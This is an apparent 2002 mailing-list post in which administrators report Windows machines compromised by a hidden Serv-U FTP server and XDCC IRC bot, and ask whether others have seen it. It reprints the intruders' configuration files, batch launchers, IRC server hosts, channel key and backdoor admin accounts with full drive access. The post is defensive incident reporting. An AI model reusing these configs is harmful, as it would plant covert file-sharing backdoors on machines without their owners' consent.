We found what might be a possible IRC Proxy/File Server trojan.

Several windows machines have already fallen prey to a set of files that set
up what seems to be both an IRC proxy and IRC file server. The first
noticeable factor is an substantial amount of CMD.EXE processes running in
the background. Other signs are pIdentd.exe, win.exe, start.exe and
services.exe also running. When you telnet to the localhost on port 880 you
are greeted with a welcome screen for the ftp server. The actual server
application is called Serv-U FTP Server v4.0 (4.0.0.4) written by Cat Soft
who is an affiliate of Rhino Software, Inc.

It seems several files are uploaded as well as creating some folders.
In Winnt\system\ there are two folders created called tools and win.

The tools folder holds the following files:
Services.exe
Srvss.exe
Start.exe
BugSlayerUtil.dll
TzoLibr.dll
ServUDaemon.ini
In
Misc
Temp
ServUStartUpLog.txt

The ServUDaemon.ini seems to be the configuration file for the FTP server
containing the following information:

[GLOBAL]
Version=4.0.0.4
RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASgAABKCQgDwQJwEQBS0t
LS0tBC0tLS0=
ProcessID=304
[DOMAINS]
Domain1=0.0.0.0||880|Server|1|0
[Domain1]
User1=admin|1|0
Group1=leech
User2=hotstuff|1|0
ReplyHello=Apache Web Server.
SignOn=c:\winnt\system\tools\in
DirChangeMesFile=c:\winnt\system\tools\misc
DirChangeMesFile2=c:\winnt\system\tools\misc
ReplyHelp=
ReplyNoAnon=
ReplyNoCredit=
ReplyTooMany=
ReplyDown=
ReplyOffline=
[GROUP=leech|1]
Access1=c:\winnt\system\win\fl|RLP
[USER=hotstuff|1]
Password=wx4FA54520E4CA1E722F1D0AAE119BE27E
HomeDir=c:\winnt\system\win\fl
RelPaths=1
AlwaysAllowLogin=1
TimeOut=600
Maintenance=System
Access1=c:\winnt\system\win\fl|RWAMLCDP
[USER=admin|1]
Password=xtEE32F1B26B1DAF9A40BC2C68BC3FC83F
HomeDir=c:\winnt\system\win\fl
AlwaysAllowLogin=1
TimeOut=600
Maintenance=System
Access1=c:\|RWAMELCDP
Access2=d:\|RWAMELCDP
Access3=e:\|RWAMELCDP
Access5=f:\|RWAMELCDP
Access6=g:\|RWAMELCDP
Access7=h:\|RWAMELCDP

Taking a look at the ServUStartUpLog.txt log file you see this:

Wed 22May02 21:15:19 - Serv-U FTP Server v4.0 (4.0.0.4) - Copyright (c)
1995-2002 Cat Soft, All Rights Reserved - by Rob Beckers
Wed 22May02 21:15:19 - Cat Soft is an affiliate of Rhino Software, Inc.
Wed 22May02 21:15:20 - Using WinSock 2.0 - max. 32767 sockets
Wed 22May02 21:15:20 - Starting FTP Server...
Wed 22May02 21:15:20 - PROBLEM: Unable to load the SSL/TLS libraries
(SSLEAY32.DLL and LIBEAY32.DLL) - No SSL support
Wed 22May02 21:15:20 - FTP Server listening on port number 880, IP
129.108.0.58, 127.0.0.1
Wed 22May02 21:15:20 - FTP Server listening on port number 43958, IP
127.0.0.1
Wed 22May02 21:15:20 - Valid registration key found

It seems like this software was actually purchased by someone.

Now the start.exe file seems to be a file created in VB which points to 4-5
bat files in c:\winnt\system32 called:

go.bat
goa.bat
gob.bat
goc.bat
god.bat

We did notice that not all machines have the god.bat file. At least mine
did not have it, but another machine did.

The following is the content of each bat file

----go.bat----
cd winnt
cd system32
Pidentd.exe /keepalive

-----goa.bat----
cd \
cd winnt
cd system
cd tools
services.exe

-----gob.bat----
c:
cd \
cd winnt
cd system
cd win
win.exe cfg.dll

-------goc.bat------
c:
cd \
cd winnt
cd system
cd win
win.exe gfc.dll

gfc.dll seems to be a typo the actual name is cfg.dll which is a
configuration file hidden as a .dll file.
It contains the following information:

xdccfile x32.dll
pidfile pidv32.dll
#logfile l.dll
logstats no
logrotate weekly
messagefile MS.dll
ignorefile IGNO32.dll
connectionmethod direct
server wcxdcc1.darktech.org 6667
server wcxdcc2.darktech.org 6667
server wcxdcc3.darktech.org 6667
server wcxdcc4.darktech.org 6667
channel #Warez-Central -plist 10 -pformat full -key distr0z
user_nick WC-DCC757
user_realname W-C
user_modes +i
virthost no
vhost_ip virtip.domain.com
firewall no
dccrangestart 4000
loginname CENTRAL
slotsmax 10
queuesize 15
slotsmaxpack 0
slotsmaxslots 8
slotsmaxqueue 10
maxtransfersperperson 1
maxqueueditemsperperson 1
filedir c:\winnt\system\win\fl
restrictlist yes
restrictsend yes
overallminspeed 0.0
transfermaxspeed 0.0
overallmaxspeed 0
overallmaxspeeddayspeed 0
overallmaxspeeddaytime 9 17
overallmaxspeeddaydays MTWRF
debug no
autosend no
autoword blah
automsg blah
autopack 1
xdccautosavetime 30
creditline [W-C] Brought To You By #Warez-Central [W-C]
adminpass EcFQIXR8y02ok
adminhost *!**
uploadallowed yes
uploaddir c:\winnt\system\win\fl
uploadmaxsize 0

Now as you can see this points to the servers as well as the login names and
passwords. You also notice the upload directory of c:\winnt\system\win\fl.
This directory is the upload directory that is being used to house files.
(We actually found some MP3's on one machine). In the win folder you find a
file called win.exe. This file seems to be the actual IRC proxy being used.

Files used:
win.exe
start.exe
pIdentd.exe
services.exe
folders:
c:\winnt\system32 (bat files)
c:\winnt\system\win
c:\winnt\system\tools
c:\winnt\system\win\fl (Upload directory)

Now we still don't know how it got in and we are still doing more research
on this. But has anyone else run into something similar? We searched on
this, but couldn't find anything. Is this a know exploit?

Any information would be helpfull.

Thanks,

Juan Carlos Ocasio
Darrel Troxel

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]